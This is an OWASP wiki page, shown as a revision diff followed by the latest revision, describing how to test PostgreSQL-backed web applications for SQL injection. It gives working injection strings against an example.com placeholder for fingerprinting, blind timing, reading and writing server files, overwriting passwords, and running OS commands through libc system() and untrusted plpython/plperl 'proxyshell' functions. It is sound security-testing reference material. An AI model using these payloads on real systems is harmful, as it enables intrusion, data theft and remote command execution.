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Difference between revisions of "OWASP Backend Security Project Testing PostgreSQL"
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| − | = | + | ==Summary== |
| − | In this | + | In this section, some SQL Injection techniques for PostgreSQL will be discussed. These techniques have the following characteristics: |
| − | |||
* PHP Connector allows multiple statements to be executed by using ''';''' as a statement separator | * PHP Connector allows multiple statements to be executed by using ''';''' as a statement separator | ||
| Line 8: | Line 7: | ||
* ''LIMIT'' and ''OFFSET'' can be used in a ''SELECT'' statement to retrieve a portion of the result set generated by the ''query'' | * ''LIMIT'' and ''OFFSET'' can be used in a ''SELECT'' statement to retrieve a portion of the result set generated by the ''query'' | ||
| − | From | + | From now on it is assumed that ''<nowiki>http://www.example.com/news.php?id=1</nowiki>'' is vulnerable to SQL Injection attacks. |
| − | = | + | ==How to Test== |
| − | == | + | === Identifying PostgreSQL === |
| + | |||
| + | When a SQL Injection has been found, you need to carefully | ||
| + | fingerprint the backend database engine. You can determine that the backend database engine | ||
| + | is PostgreSQL by using the ''::'' cast operator. | ||
| − | |||
| − | |||
| − | |||
'''Examples:''' | '''Examples:''' | ||
| Line 22: | Line 22: | ||
| − | + | In addition, the function ''version()'' can be used to grab the PostgreSQL banner. This will also show the underlying operating system type and version. | |
| + | |||
'''Example''': | '''Example''': | ||
<nowiki>http://www.example.com/store.php?id=1 UNION ALL SELECT NULL,version(),NULL LIMIT 1 OFFSET 1--</nowiki> | <nowiki>http://www.example.com/store.php?id=1 UNION ALL SELECT NULL,version(),NULL LIMIT 1 OFFSET 1--</nowiki> | ||
| − | |||
| − | |||
| − | For blind SQL | + | An example of a banner string that could be returned is: |
| + | PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4) | ||
| + | |||
| + | |||
| + | === Blind Injection === | ||
| + | |||
| + | |||
| + | For blind SQL injection attacks, you should take into consideration the following built-in functions: | ||
* String Length | * String Length | ||
| Line 41: | Line 47: | ||
| − | Starting | + | Starting at version 8.2, PostgreSQL introduced a built-in function, ''pg_sleep(n)'', to make the current |
| − | session process sleep for ''n'' seconds. | + | session process sleep for ''n'' seconds. This function can be leveraged to execute timing attacks (discussed in detail at [[Blind SQL Injection]]). |
| + | |||
| − | + | In addition, you can easily create a custom ''pg_sleep(n)'' in previous versions by using libc: | |
* CREATE function pg_sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' LANGUAGE 'C' STRICT | * CREATE function pg_sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' LANGUAGE 'C' STRICT | ||
| − | |||
| − | + | === Single Quote unescape === | |
| − | + | Strings can be encoded, to prevent single quotes escaping, by using chr() function. | |
| − | |||
| + | * chr(n): Returns the character whose ASCII value corresponds to the number n | ||
| + | * ascii(n): Returns the ASCII value which corresponds to the character n | ||
| − | Let say you want to encode the string 'root': | + | |
| + | Let's say you want to encode the string 'root': | ||
select ascii('r') | select ascii('r') | ||
114 | 114 | ||
| Line 64: | Line 72: | ||
| + | We can encode 'root' as: | ||
| + | chr(114)||chr(111)||chr(111)||chr(116) | ||
| − | |||
| − | |||
'''Example:''' | '''Example:''' | ||
| Line 72: | Line 80: | ||
| + | === Attack Vectors === | ||
| − | = | + | ==== Current User ==== |
| − | |||
| − | === Current User === | ||
| − | + | The identity of the current user can be retrieved with the following SQL SELECT statements: | |
SELECT user | SELECT user | ||
| Line 90: | Line 97: | ||
<nowiki>http://www.example.com/store.php?id=1 UNION ALL SELECT current_user, NULL, NULL--</nowiki> | <nowiki>http://www.example.com/store.php?id=1 UNION ALL SELECT current_user, NULL, NULL--</nowiki> | ||
| − | |||
| − | + | ==== Current Database ==== | |
| + | |||
| + | The built-in function current_database() returns the current database name. | ||
| + | |||
'''Example''': | '''Example''': | ||
| Line 99: | Line 108: | ||
| − | === Reading from a file === | + | ==== Reading from a file ==== |
| − | + | PostgreSQL provides two ways to access a local file: | |
* COPY statement | * COPY statement | ||
* pg_read_file() internal function (starting from PostgreSQL 8.1) | * pg_read_file() internal function (starting from PostgreSQL 8.1) | ||
| + | |||
'''COPY:''' | '''COPY:''' | ||
| − | This operator copies data between file and table. PostgreSQL engine | + | This operator copies data between a file and a table. The PostgreSQL engine accesses the local file system as the ''postgres'' user. |
'''Example:''' | '''Example:''' | ||
| − | |||
<nowiki> | <nowiki> | ||
| Line 118: | Line 127: | ||
</nowiki> | </nowiki> | ||
| − | Data should be retrieved by | + | |
| − | * retrieves number of rows previously added in ''file_store'' with ''COPY'' statement | + | Data should be retrieved by performing a ''UNION Query SQL Injection'': |
| − | * | + | * retrieves the number of rows previously added in ''file_store'' with ''COPY'' statement |
| + | * retrieves a row at a time with UNION SQL Injection | ||
| + | |||
'''Example:''' | '''Example:''' | ||
| Line 134: | Line 145: | ||
'''pg_read_file():''' | '''pg_read_file():''' | ||
| − | This function was introduced | + | |
| + | This function was introduced in ''PostgreSQL 8.1'' and allows one to read arbitrary files located inside | ||
DBMS data directory. | DBMS data directory. | ||
| + | |||
'''Examples:''' | '''Examples:''' | ||
| Line 141: | Line 154: | ||
* <nowiki>SELECT pg_read_file('server.key',0,1000); </nowiki> | * <nowiki>SELECT pg_read_file('server.key',0,1000); </nowiki> | ||
| − | |||
| − | By reverting COPY statement we can write to local | + | ==== Writing to a file ==== |
| + | |||
| + | By reverting the COPY statement, we can write to the local file system with the ''postgres'' user rights | ||
<nowiki> | <nowiki> | ||
| Line 149: | Line 163: | ||
</nowiki> | </nowiki> | ||
| − | |||
| − | + | ==== Shell Injection ==== | |
| − | |||
| + | PostgreSQL provides a mechanism to add custom functions by using both Dynamic Library and scripting languages such as python, perl, and tcl. | ||
| − | |||
| − | Until PostgreSQL 8.1 it was possible to add a custom function linked with ''libc'': | + | ===== Dynamic Library ===== |
| + | |||
| + | Until PostgreSQL 8.1, it was possible to add a custom function linked with ''libc'': | ||
* CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT | * CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT | ||
| + | |||
Since ''system'' returns an ''int'' how we can fetch results from ''system'' stdout? | Since ''system'' returns an ''int'' how we can fetch results from ''system'' stdout? | ||
| + | |||
Here's a little trick: | Here's a little trick: | ||
| Line 166: | Line 182: | ||
* create a ''stdout'' table | * create a ''stdout'' table | ||
*: ''CREATE TABLE stdout(id serial, system_out text)'' | *: ''CREATE TABLE stdout(id serial, system_out text)'' | ||
| − | * executing a shell command redirecting | + | * executing a shell command redirecting its ''stdout'' |
*: ''SELECT system('uname -a > /tmp/test')'' | *: ''SELECT system('uname -a > /tmp/test')'' | ||
* use a ''COPY'' statements to push output of previous command in ''stdout'' table | * use a ''COPY'' statements to push output of previous command in ''stdout'' table | ||
| Line 186: | Line 202: | ||
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' -- | /store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' -- | ||
| − | /store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout | + | /store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1-- |
</nowiki> | </nowiki> | ||
| − | |||
| − | PL/Python | + | ===== plpython ===== |
| − | what user. It's not installed by default and | + | |
| + | PL/Python allows users to code PostgreSQL functions in python. It's untrusted so there is no way to restrict | ||
| + | what user can do. It's not installed by default and can be enabled on a given database by ''CREATELANG'' | ||
| − | * Check if PL/Python has been enabled on | + | * Check if PL/Python has been enabled on a database: |
| − | *: ''SELECT count(*) FROM pg_language WHERE lanname=' | + | *: ''SELECT count(*) FROM pg_language WHERE lanname='plpythonu' |
| − | * If not try to enable: | + | * If not, try to enable: |
*: ''CREATE LANGUAGE plpythonu'' | *: ''CREATE LANGUAGE plpythonu'' | ||
| − | * If | + | * If either of the above succeeded, create a proxy shell function: |
*: ''CREATE FUNCTION proxyshell(text) RETURNS text AS 'import os; return os.popen(args[0]).read() 'LANGUAGE plpythonu'' | *: ''CREATE FUNCTION proxyshell(text) RETURNS text AS 'import os; return os.popen(args[0]).read() 'LANGUAGE plpythonu'' | ||
* Have fun with: | * Have fun with: | ||
*: SELECT proxyshell(''os command''); | *: SELECT proxyshell(''os command''); | ||
| + | |||
'''Example:''' | '''Example:''' | ||
| Line 210: | Line 228: | ||
return os.popen(args[0]).read()’ LANGUAGE plpythonu;-- </nowiki>'' | return os.popen(args[0]).read()’ LANGUAGE plpythonu;-- </nowiki>'' | ||
| − | *Run | + | *Run an OS Command: |
*:''<nowiki>/store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--</nowiki>'' | *:''<nowiki>/store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--</nowiki>'' | ||
| − | |||
| − | Plperl | + | ===== plperl ===== |
| + | |||
| + | Plperl allows us to code PostgreSQL functions in perl. Normally, it is installed as a trusted language in order to disable runtime execution of operations that interact with the underlying operating system, such as ''open''. By doing so, it's impossible to gain OS-level access. To successfully inject a proxyshell like function, we need to install the untrusted version from the ''postgres'' user, to avoid the so-called application mask filtering of trusted/untrusted operations. | ||
| + | |||
* Check if PL/perl-untrusted has been enabled: | * Check if PL/perl-untrusted has been enabled: | ||
*: ''SELECT count(*) FROM pg_language WHERE lanname='plperlu' | *: ''SELECT count(*) FROM pg_language WHERE lanname='plperlu' | ||
| − | * If not assuming that sysadm has | + | * If not, assuming that sysadm has already installed the plperl package, try : |
*: ''CREATE LANGUAGE plperlu'' | *: ''CREATE LANGUAGE plperlu'' | ||
| − | * If | + | * If either of the above succeeded, create a proxy shell function: |
| − | *: ''CREATE FUNCTION proxyshell(text) RETURNS text AS | + | *: ''CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu'' |
* Have fun with: | * Have fun with: | ||
*: SELECT proxyshell(''os command''); | *: SELECT proxyshell(''os command''); | ||
| + | |||
'''Example:''' | '''Example:''' | ||
*Create a proxy shell function: | *Create a proxy shell function: | ||
| − | *:''<nowiki>/store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS | + | *:''<nowiki>/store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu;</nowiki> |
| − | *Run | + | *Run an OS Command: |
*:''<nowiki>/store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--</nowiki>'' | *:''<nowiki>/store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--</nowiki>'' | ||
| − | = References = | + | == References == |
| − | |||
| − | |||
| − | + | * OWASP : "[[Testing for SQL Injection (OWASP-DV-005) |Testing for SQL Injection]]" | |
| − | + | * OWASP : [[SQL Injection Prevention Cheat Sheet]] | |
| − | + | * PostgreSQL : "Official Documentation" - http://www.postgresql.org/docs/ | |
| − | Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool - http://sqlmap.sourceforge.net | + | * Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool - http://sqlmap.sourceforge.net |
Latest revision as of 16:02, 31 July 2014
Summary
In this section, some SQL Injection techniques for PostgreSQL will be discussed. These techniques have the following characteristics:
- PHP Connector allows multiple statements to be executed by using ; as a statement separator
- SQL Statements can be truncated by appending the comment char: --.
- LIMIT and OFFSET can be used in a SELECT statement to retrieve a portion of the result set generated by the query
From now on it is assumed that http://www.example.com/news.php?id=1 is vulnerable to SQL Injection attacks.
How to Test
Identifying PostgreSQL
When a SQL Injection has been found, you need to carefully fingerprint the backend database engine. You can determine that the backend database engine is PostgreSQL by using the :: cast operator.
Examples:
http://www.example.com/store.php?id=1 AND 1::int=1
In addition, the function version() can be used to grab the PostgreSQL banner. This will also show the underlying operating system type and version.
Example:
http://www.example.com/store.php?id=1 UNION ALL SELECT NULL,version(),NULL LIMIT 1 OFFSET 1--
An example of a banner string that could be returned is:
PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
Blind Injection
For blind SQL injection attacks, you should take into consideration the following built-in functions:
- String Length
- LENGTH(str)
- Extract a substring from a given string
- SUBSTR(str,index,offset)
- String representation with no single quotes
- CHR(104)||CHR(101)||CHR(108)||CHR(108)||CHR(111)
Starting at version 8.2, PostgreSQL introduced a built-in function, pg_sleep(n), to make the current
session process sleep for n seconds. This function can be leveraged to execute timing attacks (discussed in detail at Blind SQL Injection).
In addition, you can easily create a custom pg_sleep(n) in previous versions by using libc:
- CREATE function pg_sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' LANGUAGE 'C' STRICT
Single Quote unescape
Strings can be encoded, to prevent single quotes escaping, by using chr() function.
- chr(n): Returns the character whose ASCII value corresponds to the number n
- ascii(n): Returns the ASCII value which corresponds to the character n
Let's say you want to encode the string 'root':
select ascii('r')
114
select ascii('o')
111
select ascii('t')
116
We can encode 'root' as:
chr(114)||chr(111)||chr(111)||chr(116)
Example:
http://www.example.com/store.php?id=1; UPDATE users SET PASSWORD=chr(114)||chr(111)||chr(111)||chr(116)--
Attack Vectors
Current User
The identity of the current user can be retrieved with the following SQL SELECT statements:
SELECT user SELECT current_user SELECT session_user SELECT usename FROM pg_user SELECT getpgusername()
Examples:
http://www.example.com/store.php?id=1 UNION ALL SELECT user,NULL,NULL-- http://www.example.com/store.php?id=1 UNION ALL SELECT current_user, NULL, NULL--
Current Database
The built-in function current_database() returns the current database name.
Example:
http://www.example.com/store.php?id=1 UNION ALL SELECT current_database(),NULL,NULL--
Reading from a file
PostgreSQL provides two ways to access a local file:
- COPY statement
- pg_read_file() internal function (starting from PostgreSQL 8.1)
COPY:
This operator copies data between a file and a table. The PostgreSQL engine accesses the local file system as the postgres user.
Example:
/store.php?id=1; CREATE TABLE file_store(id serial, data text)-- /store.php?id=1; COPY file_store(data) FROM '/var/lib/postgresql/.psql_history'--
Data should be retrieved by performing a UNION Query SQL Injection:
- retrieves the number of rows previously added in file_store with COPY statement
- retrieves a row at a time with UNION SQL Injection
Example:
/store.php?id=1 UNION ALL SELECT NULL, NULL, max(id)::text FROM file_store LIMIT 1 OFFSET 1;-- /store.php?id=1 UNION ALL SELECT data, NULL, NULL FROM file_store LIMIT 1 OFFSET 1;-- /store.php?id=1 UNION ALL SELECT data, NULL, NULL FROM file_store LIMIT 1 OFFSET 2;-- ... ... /store.php?id=1 UNION ALL SELECT data, NULL, NULL FROM file_store LIMIT 1 OFFSET 11;--
pg_read_file():
This function was introduced in PostgreSQL 8.1 and allows one to read arbitrary files located inside
DBMS data directory.
Examples:
- SELECT pg_read_file('server.key',0,1000);
Writing to a file
By reverting the COPY statement, we can write to the local file system with the postgres user rights
/store.php?id=1; COPY file_store(data) TO '/var/lib/postgresql/copy_output'--
Shell Injection
PostgreSQL provides a mechanism to add custom functions by using both Dynamic Library and scripting languages such as python, perl, and tcl.
Dynamic Library
Until PostgreSQL 8.1, it was possible to add a custom function linked with libc:
- CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
Since system returns an int how we can fetch results from system stdout?
Here's a little trick:
- create a stdout table
- CREATE TABLE stdout(id serial, system_out text)
- executing a shell command redirecting its stdout
- SELECT system('uname -a > /tmp/test')
- use a COPY statements to push output of previous command in stdout table
- COPY stdout(system_out) FROM '/tmp/test'
- retrieve output from stdout
- SELECT system_out FROM stdout
Example:
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
STRICT --
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
plpython
PL/Python allows users to code PostgreSQL functions in python. It's untrusted so there is no way to restrict what user can do. It's not installed by default and can be enabled on a given database by CREATELANG
- Check if PL/Python has been enabled on a database:
- SELECT count(*) FROM pg_language WHERE lanname='plpythonu'
- If not, try to enable:
- CREATE LANGUAGE plpythonu
- If either of the above succeeded, create a proxy shell function:
- CREATE FUNCTION proxyshell(text) RETURNS text AS 'import os; return os.popen(args[0]).read() 'LANGUAGE plpythonu
- Have fun with:
- SELECT proxyshell(os command);
Example:
- Create a proxy shell function:
- /store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS ‘import os; return os.popen(args[0]).read()’ LANGUAGE plpythonu;--
- Run an OS Command:
- /store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--
plperl
Plperl allows us to code PostgreSQL functions in perl. Normally, it is installed as a trusted language in order to disable runtime execution of operations that interact with the underlying operating system, such as open. By doing so, it's impossible to gain OS-level access. To successfully inject a proxyshell like function, we need to install the untrusted version from the postgres user, to avoid the so-called application mask filtering of trusted/untrusted operations.
- Check if PL/perl-untrusted has been enabled:
- SELECT count(*) FROM pg_language WHERE lanname='plperlu'
- If not, assuming that sysadm has already installed the plperl package, try :
- CREATE LANGUAGE plperlu
- If either of the above succeeded, create a proxy shell function:
- CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu
- Have fun with:
- SELECT proxyshell(os command);
Example:
- Create a proxy shell function:
- /store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu;
- Run an OS Command:
- /store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--
References
- OWASP : "Testing for SQL Injection"
- PostgreSQL : "Official Documentation" - http://www.postgresql.org/docs/
- Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool - http://sqlmap.sourceforge.net
